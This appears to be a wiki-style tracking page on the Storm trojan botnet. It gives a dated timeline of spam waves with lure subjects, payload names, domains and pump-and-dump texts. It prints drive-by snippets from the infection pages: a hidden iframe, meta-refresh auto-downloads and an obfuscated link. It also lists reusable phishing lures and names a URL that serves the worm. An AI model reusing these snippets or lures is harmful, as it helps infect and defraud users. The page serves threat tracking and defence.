Introduction[]
The Storm trojan is many things. It is arguably a worm, a trojan, malware, the unit element of a botnet, a hijacked host program, a spam sender, a directory harvester, an http website redirector, a member of a DDoS attack force, a zombie. It is spread by spam messages which can be sent from machines infected with Storm itself. The spammed message may contain a link to a hijacked host web site or web site proxy which is also running on Storm. The hijacked host may contain an attractive file to be downloaded, which once again contains the Storm infection.
Storm is unique in its ability to perform so many functions. As at December 2007, it is the most pervasive and most successful implementation of a multifunctional infection that the Internet has ever witnessed. Its capabilities to exert control and domination of key sectors of the Internet are unprecedented. Storm is too great a threat to be ignored. Estimates by researchers for the number of Windows machines infected range from 2 million minimum up to 50 million. The scanner used in Botnet Reporting usually accumulates 3,500 - 4,000 hijacked IPs being actively used to host the distribution of Storm in any 24 hour period. The ISPs that are the most infected are located in the US
These three ISPs alone account for over 20% of the world's Storm distribution network. The geographical distribution of Storm hosting sites for the top 10 countries is shown in the chart on the right, click to enlarge. It shows the accumulated host IPs from October 2007 to April 2008. |
Images[]
A list of infected machines used in botnets to host spammed sites, including the storm trojan itself, can be found in the spamtrackers download area for botnets.
|| |
Sample Spam[]
Received: from wbmdos (unknown[59.24.160.53]) by example.net (exin02) with SMTP id <2007101005045710700k7imqe>; Wed, 10 Oct 2007 05:05:55 +0000 X-Originating-IP: [59.24.160.53] Received: from bngq ([33.223.57.69]) by wbmdos with Microsoft SMTPSVC(5.0.2195.5329); Wed, 10 Oct 2007 14:05:44 +0900 Message-ID: <470D7DA3.7060302@fnblondonky.com> Date: Wed, 10 Oct 2007 14:05:44 +0900 From: <nternet@fnblondonky.com> User-Agent: Thunderbird 2.0.0.6 (Windows/20070728) MIME-Version: 1.0 To: example@example.net Subject: come get it Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Free games, What more do we need to say? http://76.180.***.***/
In this example, it is possible that the sending IP address, 59.24.160.53 was infected with Storm, and that it was Storm that sent it. It is definite that the web site IP, 76.180.***.*** was a distributer of Storm. The site at the address is designed to attract younger Internet users: previously it was offering a tempting 1,000 different Arcade games for free at the click of an icon, and now it masquerades as a greetings club with a funny kitten animation.
If we look at the links on that page, we discover that every link is for the same file, which in this case is the Storm trojan itself:
Also known as[]
The Wikipedia lists various names for this trojan -
- CME-711 (MITRE)
- W32/Nuwar@MM and Downloader-BAI (specific variant) (McAfee)
- Troj/Dorf and Mal/Dorf (Sophos)
- Trojan-Downloader.Win32.Small.dam
- Trojan.DL.Tibs.Gen!Pac13 ("FSEC")
- Trojan.Downloader-647
- Trojan.Peacomm (Symantec)
- TROJ_SMALL.EDW (Trend Micro)
- Win32/Nuwar (ESET)
- Win32/Nuwar.N@MM!CME-711 (Windows Live OneCare)
- W32/Zhelatin (F-Secure and Kaspersky)
- Trojan.Peed, Trojan.Tibs (BitDefender)
Multi AV scan of happy2008.exe - Scan taken on 26 Dec 2007
- AntiVir - Found WORM/Zhelatin.ob
- Authentium - W32/StormWorm.P
- AVG Antivirus - Found Downloader.Tibs
- BitDefender - Found Trojan.Peed.IRE
- Dr.Web - Found Trojan.Packed.263
- eTrust-Vet - Win32/Sintun.AT
- F-Prot Antivirus - Found W32/StormWorm.P
- F-Secure Anti-Virus - Found Packed.Win32.Tibs.gu
- Kaspersky Anti-Virus - Found Packed.Win32.Tibs.gu
- Microsoft - Trojan:Win32/Tibs.gen!ldr
- Prevx1 - Stormy:Worm-All Variants
- Sophos Antivirus - Found Mal/Dorf-C
- Symantec - Trojan.Peacomm.D
- Webwasher-Gateway - Worm.Zhelatin.ob
Removal[]
In September 2007, Microsoft added detection and removal of Storm in its Malicious Software Removal Tool which was included in the Windows Automatic Update package. On September 25th, Microsoft announced that MSRT may have helped reduce the size of the Storm botnet by up to 20%. The new patch, as claimed by Microsoft, removed Storm from approximately 274,372 infected systems out of 2.6 million scanned Windows systems. However, according to senior security staff at Microsoft, "the 180,000+ additional machines that have been cleaned by MSRT since the first day are likely to be home user machines that were not notably incorporated into the daily operation of the 'Storm' botnet," indicating that the MSRT cleaning may have been symbolic at best. Source
Removal instructions vary by Antivirus vendor.
For Symantec, it is at the Storm write-up page
For McAfee you need to be at the latest levels.
For F-Secure you need to be at the latest level.
Microsoft provides a Malicious Software Removal Tool (MSRT) which removes the Storm infection.
Storm / Zhelatin timeline[]
Feb 2007 - April 2007[]
In a series of social engineering releases designed to infect multiple different target sectors, this worm has appeared under many different forms. Target sectors include children, people intrigued by whimsical greeting cards, sports fanatics, the security conscious, people seeking love, people intrigued by war, news watchers, people who like to offer help, problem solvers, volunteers, game players, gamblers, etc. By varying the offering in each wave of spam, the perpetrator has sought to maximize the infection rate among the target victims.
The timeline of spam attacks illustrating the different target sectors is shown below.
February 11, 2007
Storm worm was being spread over Instant Messenger services
LOL ;-) http://***.***.***.***/ag.***(active now)
February 14
Zhelatin variant uses the Valentines Day in mail subjects such as
- Valentines Day Dance
- The Valentines Angel
- Valentines Day is here again
- Valentine’s Love
- Valentine’s Night
- Valentine Letter
- Your Love on Valentine’s
Payloads: Flash Postcard.exe flash postcard.exe greeting postcard.exe Greeting Postcard.exe greeting card.exe Greeting Card.exe postcard.exe Postcard.exe
April 9
World War III between USA and Iran, subjects such as
- USA Missle Strike: Iran War just have started
- Israel Just Have Started World War I II
- Iran Just Have Started World War III
- USA Just Have Started World War III
- Missle Strike: The USA kills more then 20000 Iranian citizens
Payloads: "News.exe" , "Movie.exe" , "Read_Me.exe" , "Click_Me.exe" , "Video.exe" , "Read_More.exe"
April 12
The lovers' worm, with subjects like
- A Toast My Love
- A Token of My Love
- Come Dance with Me
- Come Relax with Me
- Destiny
- Dream of You
- Eternal Love
- Eternity of Your Love
Payloads included Love Card.exe Love Postcard.exe My Love.exe Postcard.exe
April 13
Bogus virus or worm alert, with subjects like
- Worm Alert!
- Worm Detected!
- Virus Alert!
- Virus Activity Detected!
Payloads added a random variable this time
- patch-[Random 4 digits].zip
- removal-[Random 5 digits].zip
- hotfix-[Random 5 digits].zip
- bugfix-[Random 5 digits].zip
June 2007 - August 2007[]
June 16
Greetings on .hk domains - the body had many different .hk domains links. Subjects were typically
For You....My Love
- Gday
- Gday, Bud
- Gday, Pal
- Good day!
- Hello
- Hello, Bud
Payload: fun.exe (also some MS exploits in the web page)
June 22
Greeting cards from a friend
- You've received a postcard from a family member!
- Your family member has sent you a postcard from greetingcards.com.
- You've received a greeting card from a friend!
- You've received a greeting postcard from a worshipper!
Payload: ecard.exe
July 8
They masquerade as malware patches. The title of these spams are used such as "Trojan Detected!"
Payload: patch.exe
August 15
"msdataaccess.exe".
The spams are as the following: Subject: XXX e-card (XXX such as Birthday, Musical)
August 21
When some follows the link in the spams, it shows that you need to have Secure Login Applet installed on your computer. The payload is called "applet.exe"
The subjects of spams are as the following:
- Dated Confirmation
- Internal Support
- Internal Verification
- Login Verification
- Membership Details
- New Member Confirmation
- Registration Confirmation
- User Services
August 25
It masquerades as ecard as usual. The subjects of spams are as shown here:
- b A card for you
- Here is your E-greeting
- Someone sent you an Ecard
- This is for you
- You have a new eCard from...?
- You have received an eCard
The link in the body of the text changed from an IP (http://***.***.***.***) to a name (http://example.com)
August 26
Zhelatin begins spamming with YouTube video now.
The subjects of spams may be as the following:
- are you kidding me? lol
- Dude your gonna get caught, lol
- Dude, what if your wife finds this?
- man, who filmed this thing?
- HAHAHAHAHAHA, man your insane!
Payload = "video.exe"
August 29
The subjects used include
- Could you give us a hand?
- Could you give us your opinion?" ,
- Put in your two cents
- We could use your help
Payload = "setup.exe"
August 30
The subjects of spams:
- Cool Video is out
- dude this is not even on MTV yet
- Hot new video
- OMG, check out the new video
- this video is not out yet
- this video rocks
- your gonna love this, lol
If the video does not start playing, you need to looad the right codec. Click on the link to install it.
Payload = "codec.exe"
September 2007 - December 2007[]
September 14
Storm Trojan adopted a Football theme by offering a "game tracking system":
- Are you ready for football season?
- Are you ready for some football?
- Do you have your NFL Game List?
- Football Fan Essentials
- Football Season Is Here!
- FOOTBALL! Are You ready?
- Free NFL Game Tracker
Payload: tracker.exe
September 17
Spreading with 1000+ free games as the attraction. The spams used subjects such as
- 1000+ Free Games!
- GAMES! GAMES!
- Stop paying for games
- Thousands of hours of fun, for free
- Play all your favorite games for free
- Wow, cool games!
Payload = "ArcadeWorld.exe"
October 12
The laughing psycho kitty cat ecard. The subjects include
- Someone is thinking of you! Open your ecard!
- We have a ecard greeting for you.
- We have a ecard surprise!
Payload = SuperLaugh.exe
October 17
The krackin site, with sample spam varies, but the web site purports to provide virus protection and IP blocking. The target audience is the security conscious user.
All the new movies music and more. In one place. The Krackin network. http://***.***.***.***
Payload: krackin.exe
October 28
The Halloween version, where the target audience is the seasonal fun lover. Typical subjects include
- Make him dance
- Man this is funny
- To much fun
Sample spam -
The Dancing Skeleton Do You Want To See New Funny Sexual Helloween Game with Dancing Skeleton? Just Click Here Via Email, MSN, or IRC
Payload: halloween.exe or dancer.exe
November 12
A pump-and-dump scam was loaded onto the Storm hosting bots, replacing the existing payload. At URL http://xxx.xxx.xxx.xxx/stock.html it contained
Global Economy Newsletter Hemisphere Gold Inc. (HPGI) Current: $1.00 Market Alert - Strong Buy Gold investors find safe haven as the US Dollar continues to drop throughout 2007. Market Status: Since 2006 market annalists predicted gold to hit $800 per ounce within two years. Gold has hit $812 an ounce just one year later due to depleted gold supplies and a falling US Dollar. In an effort to find more gold, recent findings of large Gold deposits in Suriname has turned this small country into a modern day gold rush. Hemisphere Finds Gold! Hemisphere Gold.s Properties are sitting right in the middle of the largest gold mines in the region and advanced exploration has already found gold deposits as high as 3.55 ounces/ton. This region has already become know as the Gold Belt. 6 Reasons To Own HPGI 1: Gold is on a Bull Run, climbing over $200 an ounce in just 9 months. 2: Gold demand is at record highs and is expected to continue increasing. 3: Hemisphere has the cutting edge technology and financial team to take this all the way. 4: Hemispheres property sits right in the middle of the Gold Belt where over 50 million ounces of gold have already been extracted. 5: Recent findings have pushed share prices up over 120% in the last 30 days. 6: Gold is a traditional safe haven for investors in times of trouble as it keeps its value greater than currency. Hemisphere is launching a full scale marketing campaign with coverage already found on sites like Stockguru.com. With huge results already confirmed HPGI is moving into the final stages of exploration. This leaves nothing left but mining a large deposits in a primed market. HPGI should be on the top of your list for your next investment consideration.
November 18
The payload (dancer.exe) has generally been removed, so that clicking on the Download area produces
404 Not Found nginx/0.5.17
However, the site contains a malicious "iframe" exploit in its code:
<iframe src="/cgi-bin/in.cgi?p=user1" width="0" height="0"></iframe>
This exploit is analyzed at the disog.org site and described at this blogspot.
This same iframe injection has also been found on general web sites as a "drive-by" installation.
November 26
The storm host machines returned only a blank page. Attempts to load any pages - such as /stock.html - returned a "page not found" condition:
404 Not Found nginx/0.5.17
December 11
The current payload on the Storm site servers is the file "sony.exe" which McAfee identifies as Nuwar@MM
It contains the following trojan fingerprints within its code:
Software\Microsoft\Windows\CurrentVersion\Run���noskrnl.exe noskrnl.config
These fingerprints are covered in the Symantec Technical description of this trojan.
The trojan code can be viewed safely without downloading. You can search for the fingerprint string noskrnl.config to verify that it is the Storm infection.
December 12/13
The image file installed on the hosts has a pump-and-dump Securities fraud scam pushing Pink Sheets stock CYHA (Cyberhand Technologies)
December 14
The image file is replaced with two alternative files pumping two stocks FAVE and BSGC.
FAVE is listed in a press release as Simulated Environment Concepts, Inc. (PINKSHEETS: FAVE). The company web site is http://www.spacapsule.com/
Press Contact: IR Complete, Inc. 919-468-4511
BSGC is Big String Corporation, mentioned in a November Penny Investor listing as a #1 pick. The company web site is at http://www.bigstring.com
http://finance.yahoo.com/q/bc?s=BSGC.OB&t=3m
December 24
The Christmas lure is a predictable ploy - a fake greeting card. Typical subject lines:
- Merry Christmas To All
- Warm Up this Christmas
- Mrs. Clause Is Out Tonight!
- The Twelve Girls Of Christmas
- Jingle Bells, Jingle Bells
- Cold Winter Nights
.. sent you an e-card from our Free Electronic Card Service. To view your customized greeting card, simply click on the following Internet location http://www.americangreetings.b719.cn/[whatever] Regards Webmaster
Winter can be cold. I bet you could use a little something to warm you up. Take 2 min out of your day. You wont regret it. ;-) http://merrychristmasdude.com/
Payloads: happy2008.exe and sony.exe
December 26
Post Christmas Storm spams portray a New Year theme. Subjects include
- Opportunities for the new year
- Message for new year
- New Year wishes for you
- Blasting new year
- It’s the new Year
- Joyous new year
- New Hope and New Beginnings
Typical URLs:
- uhavepostcard.com
- happycards2008.com
- newyearcards2008.com
- newyearwithlove.com
- familypostcards2008.com
Payloads: "happy2008.exe" "happy-2008.exe" "happynewyear2008.exe" "happynewyear.exe" "stripshow.exe" "happy_2008.exe"
The link to the site name is obfuscated:
document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E' ) );
Domain names are now being registered in Russia with a bank of name servers and the usual fast-flux behavior
Domain Name: HAPPYCARDS2008.COM Registrar: ANO REGIONAL NETWORK INFORMATION CENTER DBA RU Whois Server: whois.nic.ru Referral URL: http://www.nic.ru Name Server: NS.HAPPYCARDS2008.COM Name Server: NS2.HAPPYCARDS2008.COM Name Server: NS3.HAPPYCARDS2008.COM Name Server: NS4.HAPPYCARDS2008.COM Name Server: NS5.HAPPYCARDS2008.COM Name Server: NS6.HAPPYCARDS2008.COM Name Server: NS7.HAPPYCARDS2008.COM Name Server: NS8.HAPPYCARDS2008.COM Name Server: NS9.HAPPYCARDS2008.COM Name Server: NS10.HAPPYCARDS2008.COM Name Server: NS11.HAPPYCARDS2008.COM Name Server: NS12.HAPPYCARDS2008.COM Name Server: NS13.HAPPYCARDS2008.COM Status: clientTransferProhibited Updated Date: 26-dec-2007 Creation Date: 26-dec-2007 Expiration Date: 26-dec-2008
December 29
Additional name servers added
- freshcards2008.com
- familypostcards2008.com
- merrychristmasdude.com
- newscorpalerts.com
- happy2008toyou.com
- happysantacards.com
- hellosanta2008.com
- hohoho2008.com
- parentscards.com
- postcards-2008.com
- santapcards.com
- santawishes2008.com
January 2008 - March 2008[]
January 9, 2008
For a short time the storm network was used in a phishing operation aimed at the banks of Halifax and Barclays. Fake domain names registered were i-halifax.com and i-barclays.com.
January 10
The suspension of the domain names used to resolve the 0 refresh fast-flux addresses were all suspended by the registrars in a synchronized move. Only existing infected machines were able to join the network, and new infections were effectively unable to locate any other network members. Any infected machine that was restarted would be likely to fail to reconnect. It is expected that this will result in a major reduction of bots within the standard 48 hour Internet caching period.
January 16
Spamming resumed using a raw IP address. Title line is With Love!.
Payload file withlove.exe or with_love.exe was in an obfuscated Java script:
January 31
Sample spam contents
Subject: You won't spend to much for these meds! Dreams can cost less here! http://91.122.38.100/xfj/
The IP address in the spam corresponds to a Storm infected machine. By repeatedly loading the same URL of that or any other Storm IP with /xfj/ appended (chosen at random) you find redirections to exactly 8 Canadian Pharmacy sites:
- andconsider.com
- bringinstrument.com
- endscience.com
- measureremember.com
- owndeep.com
- speakpound.com
- tellthrough.com
- thanpopulate.com
Canadian Pharmacy sites are in turn hosted on another fast-flux botnet. Different randomly selected subdirectory names yield the same result.
Geographic fingerprinting reveals completely different topologies for these two botnets.
The geo-print for Storm is seen under the topic Botnet hosting at and for Canadian Pharmacy at File:Bot PUF.jpg.
February 7 The infected page was changed to contain obfuscated code
February 10
Redirections from Storm infections to fake Canadian Pharmacy sites
- interestquiet.com
- chickher.com
- byoperate.com
- elementgrand.com
- tenpitch.com
- roundtoward.com
- twoinstant.com
February 11 Eight new images were introduced with a Valentines theme. There is a more direct load of the virus payload (valentine.exe) using "refresh" to ensure a higher infection rate:
<html xmlns="http://www.w3.org/1999/xhtml"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="refresh" content="5;url=valentine.exe"> <title>Your Valentine</title> <body> <center> <a href="valentine.exe"><img border=0 src="5.gif"><br></a>
</body> </html>
The random gif with the unconvincing pump and dump stock scam has been removed.
Domain names used to serve the 0-fast-flux network:
- moonstarfood.com (removed)
- destroythemoon.com (removed)
Name servers were on
ns.llldddnnn.com 76.212.174.58 ns2.llldddnnn.com 68.252.56.21 ns3.llldddnnn.com 64.221.169.181 ns4.llldddnnn.com 75.132.160.97 ns5.llldddnnn.com 68.184.51.232 ns6.llldddnnn.com 80.197.35.241 ns7.llldddnnn.com 90.150.141.112 ns8.llldddnnn.com 78.8.106.11 ns9.llldddnnn.com 59.31.54.198 ns10.llldddnnn.com 60.53.245.92 ns11.llldddnnn.com 98.206.242.41 ns12.llldddnnn.com 76.97.95.128 ns13.llldddnnn.com 24.98.214.216
February 14 Current Canadian Pharmacy redirections for Storm ngnx/0.5.17 URLs in the format http://xxx.xxx.xxx.xxx/junk/
- chancetoo.com
- enoughbreak.com
- gonebox.com
- largespeech.com
- planepound.com
- quickwant.com
- safecause.com
They have still removed the randomized gif for a pump-and-dump stock which was previously loaded with a URL in the format
http://xxx.xxx.xxx.xxx/junk.gif
March 3 The image changed to a "FunnyPostCard" lure. The payload was ecard.exe and a download is attempted even if the victim does not click on the image, by using an http refresh
<meta http-equiv="Refresh" content="5; URL=ecard.exe">
Redirection sites for Canadian Pharmacy and Cheap Drugs Online Store
- picksuch.com
- wonderright.com
- fallbroad.com
- pharmapillsforu.com
- rxpills4u.com
- cheapestpillshere.com
- ranglad.com
- speakplant.com
March 4 A new wave of spams that repeat an earlier phase of Storm propagation via fake greeting cards
Subject:
Your ecard joke is waiting You have an ecard We have a ecard surprise Someone Just sent you an ecard Did you open your ecard yet ecard waiting for you Open your ecard new ecard waiting Now this is funny online greeting waiting sent you an ecard
Body:
laughing Funny Card You have been sent a Funny Postcard You have been sent the Funny Ecard original Funny Card Someone Sent you this Funny Ecard your funny postcard original Funny Postcard sent a Funny Postcard personal funny postcard FunnyPostcard laughing funny postcard
March 20 The domain name used to interconnect Storm sites was ibank-halifax.com registered with Russian company ANO REGIONAL NETWORK INFORMATION CENTER. On March 18, 2008 it was suspended
- Status: clientHold
- Status: clientTransferProhibited
However, existing Storm hosts were still performing redirections to spam sites registered with Xin Net:
- ED Express
- surfpart.com
- darksidehq.com
- superwildside.com
- twinsideauto.com
- Pharmacy Express
- daysidehomes.com
- sideeventsonline.com
- flipsidesite.com
- United ED Meds
- esideeffect.com
All of these sites loaded their images from the one Image Server - oleroneg.info (Sponsoring Registrar: Blog.com Digital Communications Inc.)
March 31 The latest edition had an April Fool's Day theme. The picture is of a jester with the placard "April Fool" and trailing a slogan "Kick me hard" Sample subject lines were
- All Fools' Day
- Doh! All's Fool.
- Doh! April's Fool.
- Gotcha!
- Surprise! The joke's on you.
Payloads included funny.exe, foolsday.exe, kickme.exe
April 2008 - July 2008[]
April 6 Google blogspot's much abused redirection was used to draw victims into infected distribution sites. Spammed links in the form of http://some-name.blogspot.com would redirect with an "http refresh" to an infection site.
April 9
Datum: Tue, 8 Apr 2008 22:59:22 -0400 Subject: With all my love I Love Being In Love With You http://supersameas.com/
Payload = StormCodec8.exe and StormCodec.exe
April 14 Spams linking to a variety of websites owned by innocent parties for either a file called "redir.html" which links to a sugaronly.com, a Canadian Pharmacy scam pharma site, or a file called "video.exe" which is the Storm Worm download. All sites have both files though usually only one is spammed.
Sample spam:
Hello, make a wise decision, get your meds from the most reliable provider. http://www.google.it/pagead/iclk?sa=l&ai=USRUkh&num=28816&[line break inserted] adurl=http://justleopold.com/redir.html Coupon #9FQN guthrey jael
Substituting "video.exe" for "redir.html" on justleopold.com will attempt to download Storm Worm on your computer.
May 19
Infections by email use IP addresses, to conceal the domain names from research and removal
Subject: Missing you with every breath The Mood for Love http://xxx.x.xx.64/ Subject: I Knew I Loved You You & Me http://xxx.xxx.xxx.102/
Payload = iloveyou.exe loveyou.exe
Adding any subdirectory causes a redirection (http://xxx.x.xx.64/blah/) to
- catsharp.com *
- followequate.com [client hold by Xin Net, May 28]
- lowsmell.com *
- picturewest.com *
- posestory.com *
- printlength.com *
- producemorning.com *
- pressrose.com *
- industrydictionary.com
which are Canadian Pharmacy brands.
* means these run on a fast-flux botnet of 20 IP addresses, refreshing every 2 minutes.
June 1
Sample spam:
Subject: You have touched my heart Missing you http://xxx.xx.xx.73/
The page source contains
<html> <head> <title>Who is loving you?</title> </head> <body> <center><img src="lr.gif"><br> Who is loving you? Do you want to know? Just <a href="loveyou.exe">click here</a> and choose either "Open" or "Run".
</body> </html>
The payload is loveyou.exe
June 18
Short emails using an IP based URL (http://xxx.xxx.xxx.xxx) with a theme of the China Earthquake and sometimes mention of the Beijing Olympics. The click-through shows a page with a black screen promising a video. Clicking to see the video installs the Storm infection.
Sampled from the subject lines:
2008 Olympic Games are under the threat A new powerful disaster in China A new deadly catastrophe in China China is paralyzed by new earthquake
Payload: beijing.exe
June 25 Storm is sending both the "China disaster" story as well as a seemingly incompetent email with a reply address
Hello, my friend. Do you want to buy any stuff: any kind of pills, oem software, cool porn? Just mail me back, i'll find the best offer for you. My Email: gpdude22@yahoo.com
The imbedded Email addresses vary
- cstygstra@gmail.com
- gpdude22@yahoo.com
- infrared35@gmail.com
- jim@tegelaar.com
- wagz_is_god@yahoo.com
This may be a "Joe-job" designes to tarnish the reputation of those people.
June 29 Sample message:
> Date: Sun, 29 Jun 2008 01:32:24 +0900 > From: xxxxx@xxxxx.xxx > Subject: You make my world special - > My heart belongs to you http://latinlovesite.com/
Known domains
- latinlovesite.com
- makinglovedirect.com
- theloveparade.com
- yourloveletter.com
- youronlinelove.com
- lollypopycandy.com (used as a name server)
- verynicebank.com (used as a name server)
Payload = winner.exe mylove.exe
July 4
Storm worm themes frequently correlate with seasonal holidays, specifically those celebrated in the U.S. July 4th is Independence Day in the U.S., and a major holiday. Storm sites display a faux-video image with fireworks. The message on the sites is "Colorful Independence Day events have already started throughout the country. The largest firework happens on the last weekday before the Fourth of July. Unprecedented sum of money was spent on this fabulous show. If you want to see the best Independence Day firework just click on the video and run it."
It is interesting to note that storm sites do not mark major holidays not observed in the U.S., like Guy Fawkes Day, May Day, International Women's Day, or Bastille Day, nor are they fooled by U.S. public holidays like Labor Day whose significance among the general public is mostly limited to being a day off work. It suggests the involvement of someone who has at least lived for some time in the U.S. But clumsy English usage, like "firework" used in the singular or "stars and strips (sic) forever," suggests a non-native speaker is writing the subject headings and body messages, as well as the messages included on the sites themselves.
The spam has links to infected IP addresses, not domain names. All storm infected servers display the same image, not just the ones with fixed IP addresses which are included in spam. Subject headings and bodies include
Amazing firework 2008 Amazing Independence Day show America for You and Me America the Beautiful American Independence Day Bright and joyful Fourth of July Celebrate Independence Celebrating Fourth of July Celebrating the Glory of our Nation Celebrating the spirit of our Country Celebrations have already begun Fabulous Independence Day firework God bless America Happy Birthday, America! Happy Fourth of July Happy Independence Day Happy Independence Day!! Independence Day firework broke all records Light up the sky Sparkling Celebration of Independence Day Spectacular fireworks show Stars and Strips forever Super 4th! The best of 4th of July Salute The best firework you've ever seen Time for Fireworks Well done 4th! Wish your friends a happy Independence Day
Payload=fireworks.exe
(Whoever chose the name for the payload apparently is aware that "fireworks" is always plural.)
July 21
The U.S. Government began to realize the plan to replace the Dollar with the "Amero", the new currency of the North American Currency Union. Canada, the United States of America and Mexico have resolved to unit in order to resist the Worldwide Financial Crysis. You can become acquainted with the plan of the implementation of Amero, just click on the icon under this text.
Payload = amero.exe
The Amero image is also found at http://signaveritae.wordpress.com/2008/01/09/our-failing-dollar/
July 29
Storm spam arrives with subject headings about the FBI spying on Facebook users. (It goes nearly unnoticed in the midst of a deluge of spam linking to trojan downloads on hacked websites; those spams carry similar subject lines consisting of inflammatory news headlines.)
Subject: The F.B.I.'s plan to "profile" Facebook FBI may strike Facebook http://SmartNewsRadio.com/
Other possible lines used as subjects or body text include
F.B.I. can watch our conversation through Facebook F.B.I. tries to fight Facebook FBI Watching Possible Terrorists on Facebook FBI Watching Hezbollah in Facebook FBI bypasses Facebook to nail you The F.B.I. has a new way of tracking Facebook
Payload = fbi_facebook.exe
Gary Warner has a more extensive listing on his blog page
Obviously, people who visit one of those infected sites and download storm on their computers will have someone spying on them, but it won't be the FBI.
August 2008 - December 2008[]
August 14
Targeting followers of headline news stories, the Storm Trojan team sent millions of emails with catchy headlines, secretly diverting users who clicked on the "msnbc" or "CNN" link to a decoy site. The click on a newslink downloaded the Storm trojan. For example, the payload would be masquerading as an upgrade to Adobe Flash player, adobe_flash.exe. 13 out of 20 antivirus companies identified it as Storm. For example:
F-Secure Anti-Virus Found Email-Worm:W32/Zhelatin.YH, Trojan-Downloader.Win32.Exchanger.nb
January 2009 -[]
January 1
Are there still people willing to click on ecards? Someone thinks so. The malware no longer is detected as "storm"/tibs/zhelatin/zhelatin, but as "walezof," a distinct maleware entity.
Why are we including it here? Beyond the "ecard" theme, the similarities in the botnet hosting are strong: These domains use a single seat botnet with zero second refresh. Storm had been the only botnet we'd observed with that pattern. Analysts at Shadowserver report it uses a similar peer-to-peer network, as well. It's either being distributed by the same criminals or else by a very ardent admirer.
The ultimate smoking gun would be to find one of the old surviving storm domains now display the same content or are on the same botnet, but those domains now refuse connections altogether (rather than displaying different content) and they are not on a fast flux botnet at all.
January 17
Waledac's similarities to Storm continue. Storm previously tried to lure people into clicking with fake sites offering news about some catastrophic disaster; now it's a spoof of Barack Obama's campaign website with a fake news item claiming he is refusing to assume office next week. Like storm, all the previous domains with ecard themed names have also begun displaying the Obama theme.
Payloads:
president.exe obama.exe statement.exe baracknews.exe obamanews.exe barack.exe barackspeech.exe barackblog.exe obamablog.exe obamaspeech.exe usa.exe news.exe speech.exe blog.exe love.exe youandme.exe onlyme.exe onlyyou.exe you.exe video.exe readme.exe postcard.exe pdf.exe doc.exe file.exe
January 25
Waledac assumes a Valentines theme, though not a lot of spam is arriving in the US. It changes to a puppy dog Valentine theme on February 9, but still only there if you go looking for it.
Further reading[]
- CNN / msnbc update, August 2008
- Tracking by SudoSecure
- Jose Navario's analysis of April 1 2008
- Controlling domains for Storm
- Storm Tracker at TrustedSource
- Stephen Fry's non-technical summary
- Websense Security Labs: Analysis of the Storm worm waves of releases
- Storm Worm Botnet Attacks Anti-Spam Firms
- Symantec White Paper on Peerbots: Catch me if you can
- Storm design predicted
- Fast-flux as used by Storm
- The Storm Worm Wikipedia entry
- Storm Worm as a botnet
- Crypto-Gram Newsletter